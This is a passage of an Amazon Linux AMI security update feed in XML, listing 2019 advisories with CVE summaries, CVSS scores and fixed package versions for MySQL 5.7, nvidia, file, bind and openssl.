arch="noarch"><filename>Packages/perl-Pod-Escapes-1.04-294.43.amzn1.noarch.rpm</filename></package><package name="perl-Module-Loaded" version="0.08" release="294.43.amzn1" epoch="1" arch="noarch"><filename>Packages/perl-Module-Loaded-0.08-294.43.amzn1.noarch.rpm</filename></package><package name="perl-IO-Zlib" version="1.10" release="294.43.amzn1" epoch="1" arch="noarch"><filename>Packages/perl-IO-Zlib-1.10-294.43.amzn1.noarch.rpm</filename></package><package name="perl-CPAN" version="1.9800" release="294.43.amzn1" epoch="0" arch="noarch"><filename>Packages/perl-CPAN-1.9800-294.43.amzn1.noarch.rpm</filename></package><package name="perl-ExtUtils-Embed" version="1.30" release="294.43.amzn1" epoch="0" arch="noarch"><filename>Packages/perl-ExtUtils-Embed-1.30-294.43.amzn1.noarch.rpm</filename></package><package name="perl-macros" version="5.16.3" release="294.43.amzn1" epoch="4" arch="x86_64"><filename>Packages/perl-macros-5.16.3-294.43.amzn1.x86_64.rpm</filename></package><package name="perl" version="5.16.3" release="294.43.amzn1" epoch="4" arch="x86_64"><filename>Packages/perl-5.16.3-294.43.amzn1.x86_64.rpm</filename></package><package name="perl-ExtUtils-CBuilder" version="0.28.2.6" release="294.43.amzn1" epoch="1" arch="noarch"><filename>Packages/perl-ExtUtils-CBuilder-0.28.2.6-294.43.amzn1.noarch.rpm</filename></package><package name="perl-ExtUtils-Install" version="1.58" release="294.43.amzn1" epoch="0" arch="noarch"><filename>Packages/perl-ExtUtils-Install-1.58-294.43.amzn1.noarch.rpm</filename></package><package name="perl-Time-Piece" version="1.20.1" release="294.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/perl-Time-Piece-1.20.1-294.43.amzn1.x86_64.rpm</filename></package><package name="perl-devel" version="5.16.3" release="294.43.amzn1" epoch="4" arch="x86_64"><filename>Packages/perl-devel-5.16.3-294.43.amzn1.x86_64.rpm</filename></package><package name="perl-libs" version="5.16.3" release="294.43.amzn1" epoch="4" arch="x86_64"><filename>Packages/perl-libs-5.16.3-294.43.amzn1.x86_64.rpm</filename></package><package name="perl-Package-Constants" version="0.02" release="294.43.amzn1" epoch="1" arch="noarch"><filename>Packages/perl-Package-Constants-0.02-294.43.amzn1.noarch.rpm</filename></package><package name="perl-tests" version="5.16.3" release="294.43.amzn1" epoch="4" arch="x86_64"><filename>Packages/perl-tests-5.16.3-294.43.amzn1.x86_64.rpm</filename></package><package name="perl-Module-CoreList" version="2.76.02" release="294.43.amzn1" epoch="1" arch="noarch"><filename>Packages/perl-Module-CoreList-2.76.02-294.43.amzn1.noarch.rpm</filename></package><package name="perl-tests" version="5.16.3" release="294.43.amzn1" epoch="4" arch="i686"><filename>Packages/perl-tests-5.16.3-294.43.amzn1.i686.rpm</filename></package><package name="perl-core" version="5.16.3" release="294.43.amzn1" epoch="0" arch="i686"><filename>Packages/perl-core-5.16.3-294.43.amzn1.i686.rpm</filename></package><package name="perl-Time-Piece" version="1.20.1" release="294.43.amzn1" epoch="0" arch="i686"><filename>Packages/perl-Time-Piece-1.20.1-294.43.amzn1.i686.rpm</filename></package><package name="perl" version="5.16.3" release="294.43.amzn1" epoch="4" arch="i686"><filename>Packages/perl-5.16.3-294.43.amzn1.i686.rpm</filename></package><package name="perl-libs" version="5.16.3" release="294.43.amzn1" epoch="4" arch="i686"><filename>Packages/perl-libs-5.16.3-294.43.amzn1.i686.rpm</filename></package><package name="perl-macros" version="5.16.3" release="294.43.amzn1" epoch="4" arch="i686"><filename>Packages/perl-macros-5.16.3-294.43.amzn1.i686.rpm</filename></package><package name="perl-devel" version="5.16.3" release="294.43.amzn1" epoch="4" arch="i686"><filename>Packages/perl-devel-5.16.3-294.43.amzn1.i686.rpm</filename></package><package name="perl-debuginfo" version="5.16.3" release="294.43.amzn1" epoch="4" arch="i686"><filename>Packages/perl-debuginfo-5.16.3-294.43.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1181</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1181: medium priority package update for mysql57</title><issued date="2019-03-20 23:45:00" /><updated date="2019-03-25 23:03:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-2537:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: DDL). Supported versions that are affected are 5.6.42 and prior, 5.7.24 and prior and 8.0.13 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1666763:
CVE-2019-2537 mysql: Server: DDL unspecified vulnerability (CPU Jan 2019)
CVE-2019-2534:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Replication). Supported versions that are affected are 5.6.42 and prior, 5.7.24 and prior and 8.0.13 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all MySQL Server accessible data as well as unauthorized update, insert or delete access to some of MySQL Server accessible data. CVSS 3.0 Base Score 7.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N).
1666760:
CVE-2019-2534 mysql: Server: Replication unspecified vulnerability (CPU Jan 2019)
CVE-2019-2532:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Security: Privileges). Supported versions that are affected are 5.7.24 and prior and 8.0.13 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1666758:
CVE-2019-2532 mysql: Server: Security: Privileges unspecified vulnerability (CPU Jan 2019)
CVE-2019-2531:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Replication). Supported versions that are affected are 5.6.42 and prior, 5.7.24 and prior and 8.0.13 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1666757:
CVE-2019-2531 mysql: Server: Replication unspecified vulnerability (CPU Jan 2019)
CVE-2019-2529:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Optimizer). Supported versions that are affected are 5.6.42 and prior, 5.7.24 and prior and 8.0.13 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).
1666755:
CVE-2019-2529 mysql: Server: Optimizer unspecified vulnerability (CPU Jan 2019)
CVE-2019-2528:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Partition). Supported versions that are affected are 5.7.24 and prior and 8.0.13 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1666753:
CVE-2019-2528 mysql: Server: Partition unspecified vulnerability (CPU Jan 2019)
CVE-2019-2510:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: InnoDB). Supported versions that are affected are 5.7.24 and prior and 8.0.13 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1666751:
CVE-2019-2510 mysql: InnoDB unspecified vulnerability (CPU Jan 2019)
CVE-2019-2507:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Optimizer). Supported versions that are affected are 5.6.42 and prior, 5.7.24 and prior and 8.0.13 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1666750:
CVE-2019-2507 mysql: Server: Optimizer unspecified vulnerability (CPU Jan 2019)
CVE-2019-2503:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Connection Handling). Supported versions that are affected are 5.6.42 and prior, 5.7.24 and prior and 8.0.13 and prior. Difficult to exploit vulnerability allows low privileged attacker with access to the physical communication segment attached to the hardware where the MySQL Server executes to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all MySQL Server accessible data and unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 6.4 (Confidentiality and Availability impacts). CVSS Vector: (CVSS:3.0/AV:A/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:H).
1666749:
CVE-2019-2503 mysql: Server: Connection Handling unspecified vulnerability (CPU Jan 2019)
CVE-2019-2486:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Security: Privileges). Supported versions that are affected are 5.7.24 and prior and 8.0.13 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1666745:
CVE-2019-2486 mysql: Server: Security: Privileges unspecified vulnerability (CPU Jan 2019)
CVE-2019-2482:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: PS). Supported versions that are affected are 5.6.42 and prior, 5.7.24 and prior and 8.0.13 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).
1666744:
CVE-2019-2482 mysql: Server: PS unspecified vulnerability (CPU Jan 2019)
CVE-2019-2481:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Optimizer). Supported versions that are affected are 5.6.42 and prior, 5.7.24 and prior and 8.0.13 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1666743:
CVE-2019-2481 mysql: Server: Optimizer unspecified vulnerability (CPU Jan 2019)
CVE-2019-2455:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Parser). Supported versions that are affected are 5.6.42 and prior, 5.7.24 and prior and 8.0.13 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).
1666742:
CVE-2019-2455 mysql: Server: Parser unspecified vulnerability (CPU Jan 2019)
CVE-2019-2434:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Parser). Supported versions that are affected are 5.7.24 and prior and 8.0.13 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).
1666740:
CVE-2019-2434 mysql: Server: Parser unspecified vulnerability (CPU Jan 2019)
CVE-2019-2420:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Optimizer). Supported versions that are affected are 5.7.24 and prior and 8.0.13 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1666738:
CVE-2019-2420 mysql: Server: Optimizer unspecified vulnerability (CPU Jan 2019)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2420" title="" id="CVE-2019-2420" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2434" title="" id="CVE-2019-2434" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2455" title="" id="CVE-2019-2455" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2481" title="" id="CVE-2019-2481" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2482" title="" id="CVE-2019-2482" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2486" title="" id="CVE-2019-2486" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2503" title="" id="CVE-2019-2503" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2507" title="" id="CVE-2019-2507" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2510" title="" id="CVE-2019-2510" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2528" title="" id="CVE-2019-2528" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2529" title="" id="CVE-2019-2529" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2531" title="" id="CVE-2019-2531" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2532" title="" id="CVE-2019-2532" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2534" title="" id="CVE-2019-2534" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2537" title="" id="CVE-2019-2537" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mysql57-common" version="5.7.25" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-common-5.7.25-1.11.amzn1.x86_64.rpm</filename></package><package name="mysql57" version="5.7.25" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-5.7.25-1.11.amzn1.x86_64.rpm</filename></package><package name="mysql57-debuginfo" version="5.7.25" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-debuginfo-5.7.25-1.11.amzn1.x86_64.rpm</filename></package><package name="mysql57-embedded-devel" version="5.7.25" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-embedded-devel-5.7.25-1.11.amzn1.x86_64.rpm</filename></package><package name="mysql57-server" version="5.7.25" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-server-5.7.25-1.11.amzn1.x86_64.rpm</filename></package><package name="mysql57-libs" version="5.7.25" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-libs-5.7.25-1.11.amzn1.x86_64.rpm</filename></package><package name="mysql57-test" version="5.7.25" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-test-5.7.25-1.11.amzn1.x86_64.rpm</filename></package><package name="mysql57-errmsg" version="5.7.25" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-errmsg-5.7.25-1.11.amzn1.x86_64.rpm</filename></package><package name="mysql57-devel" version="5.7.25" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-devel-5.7.25-1.11.amzn1.x86_64.rpm</filename></package><package name="mysql57-embedded" version="5.7.25" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-embedded-5.7.25-1.11.amzn1.x86_64.rpm</filename></package><package name="mysql57-test" version="5.7.25" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-test-5.7.25-1.11.amzn1.i686.rpm</filename></package><package name="mysql57-debuginfo" version="5.7.25" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-debuginfo-5.7.25-1.11.amzn1.i686.rpm</filename></package><package name="mysql57-devel" version="5.7.25" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-devel-5.7.25-1.11.amzn1.i686.rpm</filename></package><package name="mysql57-errmsg" version="5.7.25" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-errmsg-5.7.25-1.11.amzn1.i686.rpm</filename></package><package name="mysql57-server" version="5.7.25" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-server-5.7.25-1.11.amzn1.i686.rpm</filename></package><package name="mysql57-embedded-devel" version="5.7.25" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-embedded-devel-5.7.25-1.11.amzn1.i686.rpm</filename></package><package name="mysql57-common" version="5.7.25" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-common-5.7.25-1.11.amzn1.i686.rpm</filename></package><package name="mysql57-libs" version="5.7.25" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-libs-5.7.25-1.11.amzn1.i686.rpm</filename></package><package name="mysql57-embedded" version="5.7.25" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-embedded-5.7.25-1.11.amzn1.i686.rpm</filename></package><package name="mysql57" version="5.7.25" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-5.7.25-1.11.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1182</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1182: low priority package update for nvidia</title><issued date="2019-03-21 19:07:00" /><updated date="2019-03-25 22:47:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-6260:
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6260" title="" id="CVE-2018-6260" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="nvidia-dkms" version="410.104" release="2018.03.111.amzn1" epoch="2" arch="x86_64"><filename>Packages/nvidia-dkms-410.104-2018.03.111.amzn1.x86_64.rpm</filename></package><package name="nvidia" version="410.104" release="2018.03.111.amzn1" epoch="2" arch="x86_64"><filename>Packages/nvidia-410.104-2018.03.111.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1186</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1186: medium priority package update for file</title><issued date="2019-03-21 22:08:00" /><updated date="2019-03-25 22:50:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-8907:
do_core_note in readelf.c in libmagic.a in file 5.35 allows remote attackers to cause a denial of service (stack corruption and application crash) or possibly have unspecified other impact.
1679138:
CVE-2019-8907 file: do_core_note in readelf.c allows remote attackers to cause a denial of service
CVE-2019-8906:
do_core_note in readelf.c in libmagic.a in file 5.35 has an out-of-bounds read because memcpy is misused.
1679175:
CVE-2019-8906 file: out-of-bounds read in do_core_note in readelf.c
CVE-2019-8905:
do_core_note in readelf.c in libmagic.a in file 5.35 has a stack-based buffer over-read, related to file_printable, a different vulnerability than CVE-2018-10360.
1679181:
CVE-2019-8905 file: stack-based buffer over-read in do_core_note in readelf.c
CVE-2019-8904:
do_bid_note in readelf.c in libmagic.a in file 5.35 has a stack-based buffer over-read, related to file_printf and file_vprintf.
1679188:
CVE-2019-8904 file: stack-based buffer over-read in do_bid_note in readelf.c
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8904" title="" id="CVE-2019-8904" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8905" title="" id="CVE-2019-8905" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8906" title="" id="CVE-2019-8906" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8907" title="" id="CVE-2019-8907" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python27-magic" version="5.34" release="3.37.amzn1" epoch="0" arch="noarch"><filename>Packages/python27-magic-5.34-3.37.amzn1.noarch.rpm</filename></package><package name="file-static" version="5.34" release="3.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/file-static-5.34-3.37.amzn1.x86_64.rpm</filename></package><package name="python26-magic" version="5.34" release="3.37.amzn1" epoch="0" arch="noarch"><filename>Packages/python26-magic-5.34-3.37.amzn1.noarch.rpm</filename></package><package name="file-devel" version="5.34" release="3.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/file-devel-5.34-3.37.amzn1.x86_64.rpm</filename></package><package name="file" version="5.34" release="3.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/file-5.34-3.37.amzn1.x86_64.rpm</filename></package><package name="file-debuginfo" version="5.34" release="3.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/file-debuginfo-5.34-3.37.amzn1.x86_64.rpm</filename></package><package name="file-libs" version="5.34" release="3.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/file-libs-5.34-3.37.amzn1.x86_64.rpm</filename></package><package name="file" version="5.34" release="3.37.amzn1" epoch="0" arch="i686"><filename>Packages/file-5.34-3.37.amzn1.i686.rpm</filename></package><package name="file-devel" version="5.34" release="3.37.amzn1" epoch="0" arch="i686"><filename>Packages/file-devel-5.34-3.37.amzn1.i686.rpm</filename></package><package name="file-libs" version="5.34" release="3.37.amzn1" epoch="0" arch="i686"><filename>Packages/file-libs-5.34-3.37.amzn1.i686.rpm</filename></package><package name="file-debuginfo" version="5.34" release="3.37.amzn1" epoch="0" arch="i686"><filename>Packages/file-debuginfo-5.34-3.37.amzn1.i686.rpm</filename></package><package name="file-static" version="5.34" release="3.37.amzn1" epoch="0" arch="i686"><filename>Packages/file-static-5.34-3.37.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1187</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1187: medium priority package update for bind</title><issued date="2019-04-04 19:13:00" /><updated date="2019-04-09 16:10:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-5741:
To provide fine-grained controls over the ability to use Dynamic DNS (DDNS) to update records in a zone, BIND 9 provides a feature called update-policy. Various rules can be configured to limit the types of updates that can be performed by a client, depending on the key used when sending the update request. Unfortunately, some rule types were not initially documented, and when documentation for them was added to the Administrator Reference Manual (ARM) in change #3112, the language that was added to the ARM at that time incorrectly described the behavior of two rule types, krb5-subdomain and ms-subdomain. This incorrect documentation could mislead operators into believing that policies they had configured were more restrictive than they actually were. This affects BIND versions prior to BIND 9.11.5 and BIND 9.12.3.
1631131:
CVE-2018-5741 bind: Incorrect documentation of krb5-subdomain and ms-subdomain update policies
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5741" title="" id="CVE-2018-5741" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="bind-utils" version="9.8.2" release="0.68.rc1.59.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-utils-9.8.2-0.68.rc1.59.amzn1.x86_64.rpm</filename></package><package name="bind" version="9.8.2" release="0.68.rc1.59.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-9.8.2-0.68.rc1.59.amzn1.x86_64.rpm</filename></package><package name="bind-libs" version="9.8.2" release="0.68.rc1.59.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-libs-9.8.2-0.68.rc1.59.amzn1.x86_64.rpm</filename></package><package name="bind-devel" version="9.8.2" release="0.68.rc1.59.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-devel-9.8.2-0.68.rc1.59.amzn1.x86_64.rpm</filename></package><package name="bind-debuginfo" version="9.8.2" release="0.68.rc1.59.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-debuginfo-9.8.2-0.68.rc1.59.amzn1.x86_64.rpm</filename></package><package name="bind-chroot" version="9.8.2" release="0.68.rc1.59.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-chroot-9.8.2-0.68.rc1.59.amzn1.x86_64.rpm</filename></package><package name="bind-sdb" version="9.8.2" release="0.68.rc1.59.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-sdb-9.8.2-0.68.rc1.59.amzn1.x86_64.rpm</filename></package><package name="bind-utils" version="9.8.2" release="0.68.rc1.59.amzn1" epoch="32" arch="i686"><filename>Packages/bind-utils-9.8.2-0.68.rc1.59.amzn1.i686.rpm</filename></package><package name="bind" version="9.8.2" release="0.68.rc1.59.amzn1" epoch="32" arch="i686"><filename>Packages/bind-9.8.2-0.68.rc1.59.amzn1.i686.rpm</filename></package><package name="bind-libs" version="9.8.2" release="0.68.rc1.59.amzn1" epoch="32" arch="i686"><filename>Packages/bind-libs-9.8.2-0.68.rc1.59.amzn1.i686.rpm</filename></package><package name="bind-debuginfo" version="9.8.2" release="0.68.rc1.59.amzn1" epoch="32" arch="i686"><filename>Packages/bind-debuginfo-9.8.2-0.68.rc1.59.amzn1.i686.rpm</filename></package><package name="bind-sdb" version="9.8.2" release="0.68.rc1.59.amzn1" epoch="32" arch="i686"><filename>Packages/bind-sdb-9.8.2-0.68.rc1.59.amzn1.i686.rpm</filename></package><package name="bind-chroot" version="9.8.2" release="0.68.rc1.59.amzn1" epoch="32" arch="i686"><filename>Packages/bind-chroot-9.8.2-0.68.rc1.59.amzn1.i686.rpm</filename></package><package name="bind-devel" version="9.8.2" release="0.68.rc1.59.amzn1" epoch="32" arch="i686"><filename>Packages/bind-devel-9.8.2-0.68.rc1.59.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1188</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1188: medium priority package update for openssl</title><issued date="2019-04-04 19:13:00" /><updated date="2019-04-09 16:10:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-1559:
If an application encounters a fatal protocol error and then calls SSL_shutdown() twice (once to send a close_notify, and once to receive one) then OpenSSL can respond differently to the calling application if a 0 byte record is received with invalid padding compared to if a 0 byte record is received with an invalid MAC. If the application then behaves differently based on that in a way that is detectable to the remote peer, then this amounts to a padding oracle that could be used to decrypt data. In order for this to be exploitable &quot;non-stitched&quot; ciphersuites must be in use. Stitched ciphersuites are optimised implementations of certain commonly used ciphersuites. Also the application must call SSL_shutdown() twice even if a protocol error has occurred (applications should not do this but some do anyway). Fixed in OpenSSL 1.0.2r (Affected 1.0.2-1.0.2q).
1683804:
CVE-2019-1559 openssl: 0-byte record padding oracle
CVE-2018-5407:
A microprocessor side-channel vulnerability was found on SMT (e.g, Hyper-Threading) architectures. An attacker running a malicious process on the same core of the processor as the victim process can extract certain secret information.
1645695:
CVE-2018-5407 openssl: Side-channel vulnerability on SMT/Hyper-Threading architectures (PortSmash)
